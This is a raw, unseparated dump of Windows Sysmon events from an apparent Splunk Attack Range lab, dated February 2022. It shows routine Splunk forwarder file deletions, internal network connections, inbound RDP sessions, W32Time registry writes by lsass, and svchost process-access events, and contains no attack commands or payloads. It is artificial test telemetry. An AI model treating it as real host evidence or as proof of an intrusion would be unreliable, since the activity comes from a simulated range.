Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294902Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:21.015{C8EA50B7-14B5-6216-A906-000000003802}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000219100Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:20.624{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51500-false10.0.1.12-8000- 23542300x8000000000000000219099Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:22.863{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE99818C942566EF91467E1BF6590CEC,SHA256=BA631060DD90A170D3E3E111C9B65EAE0AB669EB9368B73C2750BE07D49D1198,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294912Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:22.085{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75BE3246781668EEE7FB56E50A0520C6,SHA256=1B392250E7B41204711BCDA796667940DFA6CDE90E2876212976CFC46BB6A97B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219098Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:22.691{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26CFE84D9D561482E2EB8DEC66BCC86B,SHA256=E15C637B54476BE5C339A5B086A7A07CD57A0F2D692C1ABEFDE54B2C82CECCC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219101Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:23.895{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAD7569FABD05E0104196C65B875F938,SHA256=E8059E02EEF3C5856C039DA5719E2232BFE4AC486E417025B55D7F4C296819E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294913Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:23.100{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74AC9BCDC03E02C30544AD483572C0BC,SHA256=BD46BDB40147C9FC538A7E31A15E562E4DF78C31A8D833AEA9A907080170A996,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219102Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:24.941{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92923D683862B29B1AD7746DCC57A516,SHA256=70D1F08DB210DAB3EE1A6A069D8104524C1107A8327B1823E2EE119CF7B5752E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294914Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:24.116{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CE52F5F8F0725F3F5A63B9D44E4DD15,SHA256=6B09B9455B7200E8FF44FC07DD0410C8B874593484FFBC114FBC90A21E152B79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294915Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:25.135{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32519E743804A4CC80B4F4D53A8C9001,SHA256=4DD893864893362B891B0E4615827BEF6C23F76F7C4DE0ED29C1B5DD4B3DCE30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219104Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:25.957{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=78556F223BD01D9D227C8CF10DDE242E,SHA256=A58E538C7F72500E44A561AE44D72758387E5A0738D2D4C785F7F4D0D5D5C437,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219103Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:23.329{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx55770-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 13241300x8000000000000000294926Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:04:26.704{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000294925Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:04:26.704{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x008b3842) 13241300x8000000000000000294924Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:04:26.704{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8289c-0xbd4fd9e9) 13241300x8000000000000000294923Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:04:26.704{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a5-0x1f1441e9) 13241300x8000000000000000294922Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:04:26.704{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828ad-0x80d8a9e9) 13241300x8000000000000000294921Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:04:26.704{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000294920Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:04:26.704{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x008b3842) 13241300x8000000000000000294919Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:04:26.704{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8289c-0xbd4fd9e9) 13241300x8000000000000000294918Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:04:26.704{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a5-0x1f1441e9) 13241300x8000000000000000294917Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:04:26.704{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828ad-0x80d8a9e9) 23542300x8000000000000000294916Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:26.140{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECE2357932277100E96CC64EA3244ADC,SHA256=9EA8CCBFA4ACD8010DC6DAEB2F49A66AE455011F82D0F778C9AE8D02DCC5844A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219105Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:26.020{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAA685770DFCF8A124F645B61899FDAE,SHA256=53952C9988C7581744DA8EB2D258AE2AB45FA0E655DBC6627DA911927FD9B335,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294928Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:27.156{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=553410A01107688FFB23FCEEA35030F7,SHA256=7DA812409A17FEAA793C1FE0C1BE3DAACE3CF58B9C13E938E85624BAAFA85005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219106Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:27.051{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92682DEF3C99312C0055CB98CC2500A3,SHA256=82F8348E43A845824600420C0856974E5E3CE1B22B288C2242E4D64AD40A8AE4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294927Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:24.664{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49187-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000219107Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:28.082{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7209DB494C2407E9BC4E23D99FC355CB,SHA256=73AF8DF6CBF4D8960E03F0BD84AA22864BC8D9FC2C4A1164B6E06CA190F98485,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294929Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:28.157{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=325390EFA6B118802DB525149D70667A,SHA256=3229EBA94DFB4986FAD3F2C862828502C2164237BAE113C8B968EA432BD5BC42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294932Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:29.603{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=9E5FC9E93C7DE3A8D75D02F47B847589,SHA256=83A6668CF3F1BCF64003ED6FEC488C9C9F7208767782CBA4B372BBD0573E86FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294931Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:29.603{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=78EED1C70996E1BFD5B40E1A51EC00B7,SHA256=DF179A8B082419335AEF3DC859CF1EC33629F97B3B23FDD518778CE2C341FA95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294930Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:29.172{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3801649C546040C1C5B4DF0A1296737C,SHA256=2BB541D833A3DECE8D1F12764031CD66E6BAE335C9AFB8790818FD39D04B7BE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219111Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:29.707{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4457649B04EDC683F134C7E636F353BD,SHA256=9353B5C6227F79394AC8324DD0384EC9D14CC0546759AC1FF8B8A2A0D227B7A8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219110Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:26.556{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx55245-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 354300x8000000000000000219109Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:26.532{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51501-false10.0.1.12-8000- 23542300x8000000000000000219108Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:29.098{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64D58A7A639A6B15054BDFBBB4415423,SHA256=03F9E759608C1ABCB31DAB2B2C78A4501EFBE68CA17BF192BC5BC01B6EC0B1B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294933Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:30.188{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94359B8B5566E51AE086755AEE929FCB,SHA256=8C73E940200832CCAA8911D1B59DD04BC88EC5E542792BBB025D0084B0A68715,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219113Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:30.394{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=D66D569F7A27B019A4F5A88BDF7F0053,SHA256=9B5FEFB915AC94BB91A05F086014A7F2613DFC97F9C91C09C5433B0427AD7BFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219112Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:30.129{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47859BE34EC35638B7DD2BF7F6091970,SHA256=6ACB8D6887D06589FC773F24D289F4EB2091D46183EA4DCC6FDC6CB6846F0FC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294934Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:31.188{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9E78922231482ADB11E25C6879B16F3,SHA256=4DBA1F196CBC60BEE76E1A8EBFA862326ECA196280C746CE75C8859EE74E332E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219114Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:31.207{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6DB82A31E5D71D985157DBB1EDD6E2F,SHA256=918ED2E9B53DA9633E979DB1714620D1D00B437C586B54BF56CF6C57F255496C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294935Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:32.203{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1670321C3387C472EA733EF06805EF52,SHA256=9C2F77A6EA6D9BBF9E35617D9437ACEC353616A17325EB2FAE10E30E2303FDBC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219119Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:32.722{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219118Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:32.722{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219117Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:32.722{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000219116Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:30.313{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx58001-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219115Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:32.222{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F1B959AFB771393CCF6A79F06A9207E,SHA256=81A68DBC6CDA4902D6B6780F715712E34027580EC9FFD73BDED697DC625B922D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219121Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:33.238{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A01112A3FDFE3066A5501F177E97A489,SHA256=A7474AACDAD4C21BAF483551F94833C49F0A8C771449F8C25FD9B679A88F9F61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294938Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:33.457{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=12E54116463CBF58949D9E5936046FF0,SHA256=D20AC25BE0AB3873D4C6A6C0D2DCB38350C49AEEF3BB4A138DD7886AA3800435,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294937Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:33.219{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 